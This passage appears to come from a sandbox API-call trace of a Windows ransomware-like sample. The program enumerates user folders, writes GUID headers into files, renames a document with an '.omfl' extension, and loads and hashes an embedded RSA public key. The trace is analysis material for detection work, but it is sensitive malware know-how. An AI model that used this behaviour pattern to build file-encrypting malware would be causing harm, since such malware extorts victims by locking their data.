hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17418 | out: hHeap=0x4970000) returned 1 [0132.375] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0132.375] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.375] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0132.375] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.375] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0132.375] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0132.375] GetCurrentThreadId () returned 0x618 [0132.375] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0132.375] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x75799e0 [0132.375] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0132.375] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0132.375] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0132.375] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0132.375] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0132.375] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0132.375] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.375] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.375] GetCurrentThreadId () returned 0x618 [0132.375] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.376] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0132.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.376] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.376] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.376] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0132.376] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c4e0 [0132.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0132.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0132.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0132.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0132.376] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0132.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0132.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0132.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0132.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0132.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0132.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0132.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17418 [0132.376] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0132.376] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0132.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0132.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0132.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0132.376] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17430 [0132.377] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0132.377] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf168 [0132.377] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0132.377] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17400 [0132.377] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0132.377] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd171d8 [0132.377] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.377] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e18 [0132.377] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0132.377] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0132.377] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.377] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0132.377] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0132.377] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17448 [0132.378] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xe93e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.378] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0132.378] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0132.378] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0132.378] CloseHandle (hObject=0x610) returned 1 [0132.380] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0132.380] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0x74fb288 [0132.380] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tlPIR\\PDSX.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tlpir\\pdsx.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tlPIR\\PDSX.rtf.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tlpir\\pdsx.rtf.omfl")) returned 1 [0132.382] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b5e950, ftCreationTime.dwHighDateTime=0x1d5e268, ftLastAccessTime.dwLowDateTime=0x77f17430, ftLastAccessTime.dwHighDateTime=0x1d5da27, ftLastWriteTime.dwLowDateTime=0x77f17430, ftLastWriteTime.dwHighDateTime=0x1d5da27, nFileSizeHigh=0x0, nFileSizeLow=0xe93e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PDSX.rtf", cAlternateFileName="")) returned 0 [0132.382] FindClose (in: hFindFile=0xdce3b70 | out: hFindFile=0xdce3b70) returned 1 [0132.383] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0132.383] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5dc0 [0132.383] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0132.383] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5a18 [0132.383] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.383] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="Links\\" [0132.383] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0132.383] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0132.383] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0132.383] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dbb50 [0132.383] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0132.383] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0132.383] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0132.383] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0132.383] PathFindFileNameW (pszPath="") returned="" [0132.383] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0132.383] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0132.384] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.384] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0132.384] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0132.384] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8e) returned 0xdd14728 [0132.384] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned=".ini" [0132.384] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0132.384] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0132.384] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd14728 [0132.384] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned=".url" [0132.384] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0132.386] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=236) returned 1 [0132.386] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0132.389] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xc6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.389] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0132.391] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0132.391] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xec, lpOverlapped=0x0) returned 1 [0132.391] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.391] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0132.391] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.391] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.391] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0132.392] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0132.392] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0132.392] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0132.392] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0132.392] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0132.392] GetLastError () returned 0x0 [0132.392] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0132.392] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0132.392] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0132.392] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0132.392] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0132.392] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.393] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0132.393] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.393] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0132.393] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xf0) returned 0x74e3210 [0132.393] SetFilePointer (in: hFile=0x610, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0132.393] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0132.393] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0132.393] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.393] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0132.393] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0132.393] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dbb50 [0132.393] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd173e8 [0132.393] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dbb98 [0132.393] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17400 [0132.393] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17430 [0132.393] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0132.393] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17448 [0132.393] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0132.393] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0132.393] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0132.393] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0132.393] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17430 | out: hHeap=0x4970000) returned 1 [0132.393] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17448 | out: hHeap=0x4970000) returned 1 [0132.393] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.393] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0132.393] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0132.393] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0132.393] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0132.394] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17448 [0132.394] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0132.394] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd17430 [0132.394] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0132.394] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0xdd07c70 [0132.394] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0132.394] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0132.394] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0132.394] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0132.394] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf168 [0132.394] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0132.394] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd07c70 | out: hHeap=0x4970000) returned 1 [0132.394] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17448 | out: hHeap=0x4970000) returned 1 [0132.394] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0132.394] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17430 | out: hHeap=0x4970000) returned 1 [0132.394] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0132.394] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.394] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.394] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.394] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0132.394] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0132.394] GetCurrentThreadId () returned 0x618 [0132.394] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0132.394] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x7579a70 [0132.394] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0132.394] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0132.394] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0132.394] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0132.394] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0132.394] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0132.394] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.395] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.395] GetCurrentThreadId () returned 0x618 [0132.395] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.395] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.395] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0xdd07c70 [0132.395] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.395] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.395] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.395] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.395] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd07c70 | out: hHeap=0x4970000) returned 1 [0132.395] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0132.395] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: 